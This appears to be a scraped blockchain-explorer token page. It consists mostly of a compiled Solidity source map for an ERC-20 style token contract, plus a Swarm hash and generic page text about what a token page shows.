;;;;;;;;;;;:96;;:38;:96;:::i;1412:176::-;1478:4;1505:42;1515:12;:10;:12::i;:::-;1529:9;1540:6;1505:9;:42::i;7023:152::-;7108:10;7100:19;;;;:7;:19;;;;;;;;7092:37;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7146:23;7153:7;7162:6;7146;:23::i;:::-;7023:152;;:::o;1594:141::-;1700:18;;;;1666:4;1700:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;1594:141::o;7181:123::-;7253:10;7245:19;;;;:7;:19;;;;;;;;7237:37;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7283:15;7290:7;7283:6;:15::i;:::-;7181:123;:::o;814:108::-;904:10;814:108;:::o;4360:365::-;4461:19;;;4453:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4550:21;;;4542:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4623:18;;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;4685:32;;;;;;;;;;;;;;;;;4360:365;;;:::o;2773:508::-;2878:20;;;2870:70;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2969:23;;;2961:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3065;3087:6;3065:71;;;;;;;;;;;;;;;;;:17;;;:9;:17;;;;;;;;;;;;:71;;:21;:71;:::i;:::-;3045:17;;;;:9;:17;;;;;;;;;;;:91;;;;3180:20;;;;;;;:32;;3205:6;3180:32;:24;:32;:::i;:::-;3157:20;;;;:9;:20;;;;;;;;;;;;:55;;;;3238:35;;;;;;;3157:20;;3238:35;;;;;;;;;;;;;2773:508;;;:::o;5735:208::-;5815:4;5858:12;5850:6;;;;5842:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;90:11;;;84:18;71:11;;;64:39;52:2;45:10;8:100;;;12:14;5842:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5901:5:0;;;5735:208::o;5389:197::-;5441:4;5477:5;;;5511:6;;;;5503:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5577:1;5389:197;-1:-1:-1;;;5389:197:0:o;3293:345::-;3377:21;;;3369:66;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3471:12;;:24;;3488:6;3471:24;:16;:24;:::i;:::-;3456:12;:39;3537:18;;;:9;:18;;;;;;;;;;;:30;;3560:6;3537:30;:22;:30;:::i;:::-;3516:18;;;:9;:18;;;;;;;;;;;:51;;;;3593:37;;;;;;;3516:18;;:9;;3593:37;;;;;;;;;;3293:345;;:::o;4025:329::-;4092:17;;;4084:55;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4174:14;;;4160:11;4174:14;;;;;;;;;;;;4209:18;;;4263:12;;:24;;4174:14;4263:24;:16;:24;:::i;:::-;4248:12;:39;4313:33;;;;;;;;4335:1;;4313:33;;;;;;;;;;;;;4025:329;;:::o;5592:137::-;5644:4;5678:43;5682:1;5685;5678:43;;;;;;;;;;;;;;;;;:3;:43::i
Swarm Source
bzzr://bd911e629c1f68190f8bb7c737070993df6b11803e5d1d212ee37a4eab921c33
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.